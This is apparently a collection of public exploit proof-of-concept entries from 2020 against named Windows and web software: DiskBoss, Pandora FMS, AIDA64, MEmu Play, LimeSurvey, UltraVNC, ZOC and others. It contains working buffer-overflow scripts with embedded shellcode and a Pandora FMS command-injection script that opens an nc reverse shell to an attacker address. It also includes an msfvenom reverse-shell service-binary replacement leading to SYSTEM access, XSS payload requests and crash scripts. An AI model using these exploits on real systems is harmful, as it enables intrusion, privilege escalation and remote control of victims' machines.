
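# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-04-01
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#
# Steps to Produce the Crash:
# 1.- Run python code: DiskbossLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for diskbsg.exe
#     (The PoC contains no DEP bypass: the shellcode runs from the overflowed
#     buffer and only executes because DEP is switched off by hand here.)
# 4.- Open "diskboss.exe" (diskbsg.exe)
# 5.- Go to "Command" > Search Files
# 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
# 7.- Click on " Add Input Directory"
# 8.- Paste ClipBoard into the "Directory" field
# 9.- Click on OK
# 10.- Calc.exe runs
#################################################################################################################################################
# Python "DiskbossLCE.py" Code:
"""Build the DiskBoss 7.7.14 'Input Directory' overflow payload and write it to DiskbossLCE.txt.

Everything is handled as bytes and the file is opened in binary mode. The original
Python 2 script wrote a str in text mode; under Python 3 that would UTF-8 encode
the 0xCA/0xA4 bytes of the gadget address and the overwrite would no longer match.
"""

OUTPUT = "DiskbossLCE.txt"

# 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll)
# Stored little-endian. The address is taken from the QtGui4.dll shipped with
# 7.7.14 and only holds if that module loads at its preferred base on the target.
JMP_EBX = b"\xCA\xA4\x0E\x65"

# msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "\x0a\x0d\x2f\x5c\x00"
# alpha_mixed keeps every byte printable so it survives the "Directory" text field.
# BufferRegister=EBX means the decoder expects EBX to point at its own start, which
# is why the gadget above is a jmp ebx.
SHELLCODE = (
    b"\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    b"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73"
    b"\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b"
    b"\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51"
    b"\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77"
    b"\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53"
    b"\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f"
    b"\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71"
    b"\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c"
    b"\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67"
    b"\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31"
    b"\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51"
    b"\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51"
    b"\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58"
    b"\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d"
    b"\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42"
    b"\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46"
    b"\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43"
    b"\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30"
    b"\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73"
    b"\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f"
    b"\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31"
    b"\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30"
    b"\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32"
    b"\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65"
    b"\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f"
    b"\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a"
    b"\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53"
    b"\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53"
    b"\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36"
    b"\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41"
)

JUNK_BEFORE = 4096  # offset at which JMP_EBX lands (determined for the tested build)
JUNK_AFTER = 1196   # padding between the gadget and the shellcode


def build_payload():
    """Return the payload bytes: filler, jmp-ebx gadget, padding, then the shellcode."""
    return b"A" * JUNK_BEFORE + JMP_EBX + b"C" * JUNK_AFTER + SHELLCODE


def main():
    """Write the payload to OUTPUT so it can be pasted into the 'Directory' field."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_payload())


if __name__ == "__main__":
    main()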
  2. # Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution # Build: PC170324 - MR 0 # Date: 2020-03-30 # Exploit Author: Basim Alabdullah # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # # Authenticated Remote Code Execution # # Vulnerable file: extension/net_tools.php # Vulnerable Code: # # $traceroute = whereis_the_command ('traceroute'); # if (empty($traceroute)) { # ui_print_error_message(__('Traceroute executable does not exist.')); # } # else { # echo "<h3>".__("Traceroute to "). $ip. "</h3>"; # echo "<pre>"; # ----> echo system ("$traceroute $ip"); # echo "</pre>"; # # <?php error_reporting(0); $username = $argv[2]; $password = $argv[3]; $url = $argv[1]."/index.php?login=1"; $postinfo = "nick=".$username."&pass=".$password."&login_button=Login"; $attackerip = $argv[4]; $attackerport = $argv[5]; $payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}"; if(!empty($argv[1])) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo); curl_exec($ch); curl_close($ch); $ch1 = curl_init(); curl_setopt($ch1, CURLOPT_HEADER, false); curl_setopt($ch1, CURLOPT_NOBODY, false); curl_setopt($ch1, CURLOPT_URL, 
$argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools"); curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp"); curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch1, CURLOPT_REFERER, $url); curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch1, CURLOPT_POST, 1); curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute"); curl_exec($ch1); curl_close($ch1); echo $payload."\n"; } else{ echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n"; } ?> # # Persistent Cross-Site Scripting. # The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859&#039;;document.location=1//981xgeu3m in the application's response. 
# # GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 # HTTP/1.1 # Host: pandorafms.host # User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 # Accept: text/html, */*; q=0.01 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events # X-Requested-With: XMLHttpRequest # Connection: close # Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1
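# Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)
# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Software Link: http://download.aida64.com/aida64engineer620.exe
# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
# Tested on: Win7 x86 SP1 - Build 7601
# Description:
# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.
# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open AIDA64 Engineer
# - First, click on "File", "Preferences"
# - Click menu "Report", "Report File"
# - Enter a long string in the field "File name"
# - Set "File extension" to automatic, as by default
# - Click OK
# - Second, in the main menu, click "Report" which shows the "Report Wizard"
# - Next, "System Summary only", next, "Plain Text", Finish
# - Click the button "Send In E-mail"
# - Check results
# WinDBG initial crash output using only A's:
# (994.998): Access violation - code c0000005 (!!! second chance !!!)
# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
# ntdll!RtlAcquireSRWLockShared+0x1a:
# 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????
#!/usr/bin/python
"""Generate the AIDA64 Engineer 6.20.5300 'Report File' SEH overflow payload.

Layout (offsets for the tested build): 315 filler bytes, a 4-byte nSEH holding a
JNO/JO short-jump pair that skips the handler address, the SEH handler pointing
at a POP POP RET in aida64.exe, a stub that moves ESI-relative address of the
buffer into EAX, 32 ASCII NOPs, the alpha_mixed calc shellcode and 'D' filler up
to MAXLEN. Every byte stays below 0x80 because bytes above 0x7f are mangled
by the target (see the msfvenom command).

The original Python 2 script concatenated str values; under Python 3 this module
builds bytes throughout and writes the file in binary mode.
"""
import struct
import sys

FILENAME = "aida64_engineer_poc.txt"

# Maximum length
MAXLEN = 5000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax
# Payload size: 440 bytes
SHELLCODE = (
    b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30"
    b"\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43"
    b"\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b"
    b"\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52"
    b"\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c"
    b"\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a"
    b"\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30"
    b"\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78"
    b"\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70"
    b"\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32"
    b"\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f"
    b"\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79"
    b"\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d"
    b"\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57"
    b"\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38"
    b"\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38"
    b"\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51"
    b"\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52"
    b"\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71"
    b"\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55"
    b"\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b"
    b"\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d"
    b"\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a"
    b"\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66"
    b"\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75"
    b"\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53"
    b"\x55\x65\x50\x41\x41"
)

# Align the registers
# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x10bac
# (the three ADD AX steps plus INC EAX add exactly 0x103f + 1 + 0x7f01 + 0x7c6b = 0x10bac)
ALIGN_EAX = (
    b"\x56"              # PUSH ESI
    b"\x58"              # POP EAX
    b"\x66\x05\x3f\x10"  # ADD AX,0x103f   -> EAX = 0x04aaffff
    b"\x40"              # INC EAX         -> EAX = 0x04ab0000
    b"\x66\x05\x01\x7F"  # ADD AX,0x7f01   -> EAX = 0x04ab7f01
    b"\x66\x05\x6b\x7c"  # ADD AX,0x7c6b   -> EAX = 0x04abfb6c
    b"\x50"              # PUSH EAX
)

# Offsets recorded from the crash. CRASH_EBP and CRASH_ESI are informational only;
# the payload is laid out from CRASH_SEH.
CRASH_EBP = 307
CRASH_ESI = 1583
CRASH_SEH = 319
CRASH_NSEH = CRASH_SEH - 4

# Variables
ASCII_NOP = b"\x47"       # Doesn't do anything particular for this program
NOPS = ASCII_NOP * 32     # ASCII NOP's amount

NSEH = b"\x71\x06\x70\x04"  # JNO SHORT / JO SHORT - jump over NSEH/SEH
# POP POP RET in aida64.exe. A fixed address inside the main image assumes the
# image is loaded at its preferred base (no ASLR relocation) - confirm for the
# tested build if the PoC does not reproduce.
SEH = struct.pack("<L", 0x0121076e)


def build_payload(maxlen=MAXLEN):
    """Return the payload bytes padded with 'D' up to exactly `maxlen`.

    Raises ValueError if `maxlen` is smaller than the fixed part; the original
    silently produced a short (useless) file in that case.
    """
    prefix = b"A" * CRASH_NSEH
    suffix = ALIGN_EAX      # Align registers to execute shellcode
    suffix += NOPS          # Some ASCII friendly NOP's
    suffix += SHELLCODE     # Magic!
    fixed_len = len(prefix + NSEH + SEH + suffix)
    if maxlen < fixed_len:
        raise ValueError("maxlen %d is smaller than the fixed payload (%d bytes)" % (maxlen, fixed_len))
    # Concatenate string for payload
    return prefix + NSEH + SEH + suffix + b"D" * (maxlen - fixed_len)


def main():
    """Write the payload to FILENAME; exit non-zero if the file cannot be created."""
    payload = build_payload()
    try:
        with open(FILENAME, "wb") as fh:
            fh.write(payload)
    except OSError as exc:
        # The original used a bare except and exited 0, hiding both cause and failure.
        print("[!] Error creating file: %s" % exc)
        sys.exit(1)
    print("[+] File " + FILENAME + " with size " + str(len(payload)) + " created successfully")


if __name__ == "__main__":
    main()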
  4. # Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions # Discovery by: chuyreds # Discovery Date: 2020-03-08 # Vendor Homepage: https://www.memuplay.com/ # Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release # Tested Version: 7.1.3 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Description: # Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions # Prerequisites # Local, Low privilege access with restart capabilities # Details # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. # A low privilege account is able to rename the MemuService.exe file located in this same path and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) Se procesaron correctamente 1 archivos; error al procesar 0 archivos C:\>sc qc MEmuSVC [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MEmuSVC TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MEmuSVC DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Proof of Concept 1. 
Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe 2. Set up a listener and ensure apache is running on the attacking machine nc -lvp 443 service apache2 start 3. Download the malicious .exe on the victim machine Open a browser to http://192.168.1.130/MemuService.exe and download 4. Replace the service binary with the malicious .exe (the inherited Full-control ACE for Everyone/Users shown above is what lets a low-privileged user do this). Rename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak Copy/Move the downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ 5. Restart the victim machine (the service is AUTO_START, so the replaced binary is launched as LocalSystem at boot) 6. Reverse shell on the attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  5. # Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.2.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Key' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  6. # Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) # Exploit Author: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: https://www.spotauditor.com/ # Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe # Tested Version: 5.3.4 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, # including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook # smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 # top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run SpotAuditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  7. # Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, # and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that # a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing # software significantly reduces the total cost of network management in enterprise environments by enabling # IT personnel and systems administrators gather a wide range of information from all the computers in the network without # installing server-side applications on these computers and create a report of potential problems that were found. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  8. # Exploit Title: Frigate 3.36 - Denial of Service (PoC) # Date: 2020-04-05 # Exploit Author: inter # Vendor Homepage: http://www.Frigate3.com/ # Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe # Vulnerable Software: Firgate # Version: 3.36 # Vulnerability Type: Denial of Service (DoS) Local # Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English) #Steps to Produce the Crash: # 1.- Run python code: crash.py # 2.- Copy content to clipboard # 3.- Open "Frigate3.exe" # 4.- Go to "Disk" > Find Computer # 5.- Paste ClipBoard into the "Computer Name:" field # 6.- Click on OK # 7.- Crashed #Python "crash.py" Code: buffer = "\x41" * 2000 f = open ("Frigate.txt", "w") f.write(buffer) f.close()
  9. # Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py #2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Repeater host" Paste Clipboard #6.- Click on "OK" #7.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w') f.write(cod) f.close()
  10. # Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11456 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. Vulnerable Parameter : "title" # POC POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 Host: TARGET Content-Length: 374 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D Connection: close YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
  11. # Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py #2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Password" Paste Clipboard #6.- Click on "OK" #7.- Click on "Propieties" #8.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w') f.write(cod) f.close()
  12. # Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py #2.- Open UltraViewer_VNCServer.txt and copy content to clipboard #3.- Open UltraVNC Viewer #4.- In "VNC Server" Paste Clipboard #5.- Click on "Connect" #6.- Crashed cod = "\x41" * 256 f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w') f.write(cod) f.close()
  13. # Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.emtec.com # Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe # Tested Version: 7.25.5 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py #2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select File > Create SSH Key Files... #5.- Select "Private key file:" field erease and Paste ClipBoard #6.- Click on "Create public/private key files..." #7.- Crashed buffer = "\x41" * 2000 f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w") f.write(buffer) f.close()
